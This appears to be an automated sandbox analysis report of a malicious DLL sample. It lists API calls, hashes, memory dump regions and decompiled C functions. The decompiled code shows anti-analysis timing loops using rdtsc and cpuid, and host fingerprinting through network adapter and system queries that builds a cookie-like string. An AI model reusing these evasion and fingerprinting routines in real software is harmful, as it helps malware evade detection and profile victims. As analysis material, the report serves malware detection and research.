                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 0022233C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,00000000,00222CB1,?,?,00000003,002224A4), ref: 002216CB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InformationQuerySystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3562636166-0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                			E00222434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
                                                                                                                                                                                                                				void* __rbp;
                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                				signed long long _t51;
                                                                                                                                                                                                                				signed long long _t52;
                                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                                				long long _t69;
                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t82 = __r9;
                                                                                                                                                                                                                				_t71 = __rsi;
                                                                                                                                                                                                                				_t69 = __rdi;
                                                                                                                                                                                                                				_t64 = __rdx;
                                                                                                                                                                                                                				_t52 = __rbx;
                                                                                                                                                                                                                				_t51 = __rax;
                                                                                                                                                                                                                				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                                				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                                				_t73 = _t75 - 0x57;
                                                                                                                                                                                                                				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                                				_t40 = _t4;
                                                                                                                                                                                                                				goto L1;
                                                                                                                                                                                                                				L9:
                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                				L1:
                                                                                                                                                                                                                				asm("rdtsc");
                                                                                                                                                                                                                				_t64 = _t64 << 0x20;
                                                                                                                                                                                                                				_t51 = _t51 | _t64;
                                                                                                                                                                                                                				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                                				SleepEx(??, ??); // executed
                                                                                                                                                                                                                				_t69 = _t69 - 1;
                                                                                                                                                                                                                				if(_t69 != 0) {
                                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					wsprintfA();
                                                                                                                                                                                                                					E002211FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                                					_t37 = E0022153C(_t73 - 0x29);
                                                                                                                                                                                                                					E00222C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                                					_t44 = _t51;
                                                                                                                                                                                                                					if(_t51 != 0) {
                                                                                                                                                                                                                						_t80 = _t73 + 0x67;
                                                                                                                                                                                                                						if(E00221EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                                							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                                							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                                								_t27 = E0022272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                                								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                                								_t41 = _t27;
                                                                                                                                                                                                                								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                                									GetProcessHeap();
                                                                                                                                                                                                                									HeapFree(??, ??, ??);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								E00221FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                                								_t49 = _t51;
                                                                                                                                                                                                                								if(_t51 != 0) {
                                                                                                                                                                                                                									E00222A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}















                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                • Instruction ID: 0d3c4b3b9faba516df73fb83471f407100eb8448c6c4f3264ce0450d2fa87f13
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A121C132310A61FAEF14EFF1E8547DD2361E754784F884426EE0D57618EE38D669C750
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 354099737-0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00221E13), ref: 0022264B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %
                                                                                                                                                                                                                • API String ID: 0-2567322570
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                			E00221E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
                                                                                                                                                                                                                				signed int _t18;
                                                                                                                                                                                                                				signed long long _t31;
                                                                                                                                                                                                                				signed long long _t34;
                                                                                                                                                                                                                				signed long long _t41;
                                                                                                                                                                                                                				signed long long _t42;
                                                                                                                                                                                                                				signed long long _t43;
                                                                                                                                                                                                                				signed long long _t44;
                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                				signed long long _t47;
                                                                                                                                                                                                                				long long _t49;
                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t47 = __rsi;
                                                                                                                                                                                                                				_t41 = __rdx;
                                                                                                                                                                                                                				_t31 = __rax;
                                                                                                                                                                                                                				 *((long long*)(_t51 + 8)) = __rbx;
                                                                                                                                                                                                                				 *((long long*)(_t51 + 0x10)) = _t49;
                                                                                                                                                                                                                				 *((long long*)(_t51 + 0x18)) = __rsi;
                                                                                                                                                                                                                				_push(_t45);
                                                                                                                                                                                                                				_t52 = _t51 - 0x30;
                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                					SwitchToThread();
                                                                                                                                                                                                                					asm("rdtsc");
                                                                                                                                                                                                                					_t42 = _t41 << 0x20;
                                                                                                                                                                                                                					asm("cpuid");
                                                                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x20)) = 1;
                                                                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
                                                                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x28)) = 0;
                                                                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
                                                                                                                                                                                                                					asm("rdtsc");
                                                                                                                                                                                                                					_t43 = _t42 << 0x20;
                                                                                                                                                                                                                					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
                                                                                                                                                                                                                					_t45 = _t45 + _t34;
                                                                                                                                                                                                                					_t18 = SwitchToThread();
                                                                                                                                                                                                                					asm("rdtsc");
                                                                                                                                                                                                                					_t44 = _t43 << 0x20;
                                                                                                                                                                                                                					asm("rdtsc");
                                                                                                                                                                                                                					_t41 = _t44 << 0x20;
                                                                                                                                                                                                                					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
                                                                                                                                                                                                                					_t47 = _t47 + _t31;
                                                                                                                                                                                                                					_t49 = _t49 - 1;
                                                                                                                                                                                                                				} while (_t49 != 0);
                                                                                                                                                                                                                				return _t18 / _t47;
                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                			E001B27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                				void* __rdi;
                                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                				long long _t46;
                                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                                                                                				intOrPtr* _t62;
                                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                                				long long* _t67;
                                                                                                                                                                                                                				intOrPtr* _t69;
                                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                                				struct HINSTANCE__* _t79;
                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                				CHAR* _t82;
                                                                                                                                                                                                                				char* _t83;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t64 = __rsi;
                                                                                                                                                                                                                				_t46 = __rbx;
                                                                                                                                                                                                                				_t44 = _t69;
                                                                                                                                                                                                                				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                                                                                                                				 *((long long*)(_t44 + 0x18)) = __rbp;
                                                                                                                                                                                                                				 *((long long*)(_t44 + 0x20)) = __rsi;
                                                                                                                                                                                                                				_push(_t62);
                                                                                                                                                                                                                				_t80 = __rcx;
                                                                                                                                                                                                                				_t83 = L"; _gid=";
                                                                                                                                                                                                                				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
                                                                                                                                                                                                                				LoadLibraryA(_t82);
                                                                                                                                                                                                                				GetProcAddress(_t79);
                                                                                                                                                                                                                				_t67 = _t44;
                                                                                                                                                                                                                				if(_t44 == 0) {
                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                					r9d = 1;
                                                                                                                                                                                                                					_t23 = E001B2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x1b70c4, _t77, _t78);
                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                					return _t23;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t24 =  *_t67(); // executed
                                                                                                                                                                                                                				if(_t24 == 0x6f && __rbx != 0) {
                                                                                                                                                                                                                					GetProcessHeap();
                                                                                                                                                                                                                					_t9 = _t64 + 8; // 0x8
                                                                                                                                                                                                                					_t36 = _t9;
                                                                                                                                                                                                                					HeapAlloc(??, ??, ??);
                                                                                                                                                                                                                					_t62 = _t44;
                                                                                                                                                                                                                					if(_t44 == 0) {
                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t54 = _t44; // executed
                                                                                                                                                                                                                					_t27 =  *_t67(); // executed
                                                                                                                                                                                                                					if(_t27 == 0) {
                                                                                                                                                                                                                						_t48 = _t62;
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
                                                                                                                                                                                                                								_t35 =  *((intOrPtr*)(_t48 + 0x194));
                                                                                                                                                                                                                								if(_t54 - 1 <= 7) {
                                                                                                                                                                                                                									r9d = _t35;
                                                                                                                                                                                                                									_t18 = _t48 + 0x198; // 0x198
                                                                                                                                                                                                                									_t54 = _t80 + _t64 * 2;
                                                                                                                                                                                                                									E001B2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
                                                                                                                                                                                                                									_t64 = _t64 + _t44;
                                                                                                                                                                                                                									_t83 = ":";
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t48 =  *_t48;
                                                                                                                                                                                                                						} while (_t48 != 0);
                                                                                                                                                                                                                						GetProcessHeap();
                                                                                                                                                                                                                						_t36 = 0;
                                                                                                                                                                                                                						_t23 = HeapFree(??, ??, ??);
                                                                                                                                                                                                                						if(_t64 == 0) {
                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					GetProcessHeap();
                                                                                                                                                                                                                					_t36 = 0;
                                                                                                                                                                                                                					HeapFree(??, ??, ??);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}
























                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B280F
                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B2845
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3177971545-0
                                                                                                                                                                                                                • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                • Instruction ID: c60b736c70a9bf67489b71118c13e7adc89abf349c8ce38b573650b6f9e0f5ab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21316B76705B8196EB15EB66E8407D977A0FB89F94F488026EF0D0775AEF38C58AC340
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                • Instruction ID: 5be9b9012fc57d3ca06ec49e383a8e517c543350cab4152e28e5ac8411bb9b6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1871DB32311B819BEB24CF66E860BE937A5FB48B94F858129EE4A43B54DF38D595C700
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,00000000,001B2CB1,?,?,00000003,001B24A4), ref: 001B16CB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InformationQuerySystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3562636166-0
                                                                                                                                                                                                                • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                • Instruction ID: de5eaa73b4bf9c880d833e3b3f886915295f1350fa53a2abd89165a0753c6d5c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA217C75315B4093EF04AB56E8643E972A2BB89BC1F9A8034EE0A87715EF3CC8458700
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2117243734.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117234477.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117252147.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117282688.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117292804.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction ID: d58402523aa45de61867f6b8ded07bb346793c2564f4517cd5f4910259ccd42d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F451E1B251D6C48AE3A18B24E89479BBFA0F386358F145158E6CD4BBA9C37DC514CF44
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2117243734.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117234477.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117252147.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117282688.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117292804.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction ID: 6608af3ea9cadc71cadd7eaf5fd0afc6bc6969bf4d43f0012be74416a8711f7a
